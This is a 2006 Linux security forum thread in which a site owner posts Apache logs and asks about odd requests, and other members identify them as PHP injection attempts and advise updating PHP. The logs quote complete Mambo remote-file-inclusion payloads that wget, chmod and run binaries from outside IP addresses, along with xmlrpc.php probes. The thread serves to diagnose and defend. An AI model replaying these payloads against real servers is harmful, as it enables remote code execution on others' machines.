Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
 |
02-19-2006, 06:29 AM
|
#1
|
Member
Registered: Sep 2005
Distribution: Debian
Posts: 304
Rep:
|
Strange things (for me) on apache log
I will post here some strange things that is happening on apache login. Is it normal?
Code:
82.131.44.102 - - [19/Feb/2006:04:47:44 -0300] "GET http://www.yahoo.com/ HTTP/1.1" 200 243
No i'm not from yahoo
Code:
84.58.236.1 - - [18/Feb/2006:18:06:12 -0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:14 -0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 200 243
84.58.236.1 - - [18/Feb/2006:18:06:15 -0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:17 -0200] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:18 -0200] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:19 -0200] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:22 -0200] "POST /xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:22 -0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:23 -0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:26 -0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:27 -0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:31 -0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:33 -0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:33 -0200] "POST /xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:35 -0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 290
84.58.236.1 - - [18/Feb/2006:18:06:39 -0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 290
None of those pages exist on my webserver. /index.php is an empty file.
Code:
219.134.116.232 - - [18/Feb/2006:04:07:06 -0200] "GET /level/16/exec/-///pwd HTTP/1.0" 404 290
What is this?
Code:
164.77.218.21 - - [18/Feb/2006:03:28:25 -0200] "PROPFIND /fernando/ftp/ HTTP/1.1" 405 239
Strange again...
|
|
|
02-19-2006, 10:55 AM
|
#2
|
LQ Newbie
Registered: Sep 2005
Distribution: Debian (Etch), Centos 4.3
Posts: 3
Rep:
|
As far as the get attempts, I've been seeing them at work on our CSA console. So far it seems to be related to a php injection attempt, but as our NIDS aren't seeing anything, av scan was negative, and couldn't find any strange outbound connections all I've been able to do is block outbound traffic to that ip.
ps: I had links to the pages, but I'm getting errors about not being able to post links. Search on mambo and wget and you should get some good info.
|
|
|
02-19-2006, 06:26 PM
|
#3
|
Member
Registered: Sep 2005
Distribution: Debian
Posts: 304
Original Poster
Rep:
|
Should i update php?
Happened again...
Code:
151.11.45.70 - - [19/Feb/2006:21:25:03 -0300] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:04 -0300] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 200 243
151.11.45.70 - - [19/Feb/2006:21:25:05 -0300] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:07 -0300] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:08 -0300] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:09 -0300] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:11 -0300] "POST /xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:12 -0300] "POST /blog/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:13 -0300] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:15 -0300] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:16 -0300] "POST /drupal/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:18 -0300] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:19 -0300] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:20 -0300] "POST /xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:22 -0300] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 290
151.11.45.70 - - [19/Feb/2006:21:25:23 -0300] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 290
Last edited by stormrider_may; 02-19-2006 at 06:30 PM.
|
|
|
02-19-2006, 10:18 PM
|
#4
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
If you are running an outdated version of PHP, then absolutely. If you are running any versions of outdated software the answer should always be yes.
Looking over your logs, one of the entries shows a 200 response code. Do you see any thing in /tmp named 'gicumz' or looks suspicious? Also, what version of PHP have you been running?
|
|
|
02-20-2006, 05:23 AM
|
#5
|
Member
Registered: Sep 2005
Distribution: Debian
Posts: 304
Original Poster
Rep:
|
My /tmp is clean, there are no files inside it.
about php, iīm using php4, i canīt get the exact version, where do i get it?
|
|
|
All times are GMT -5. The time now is 05:04 AM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|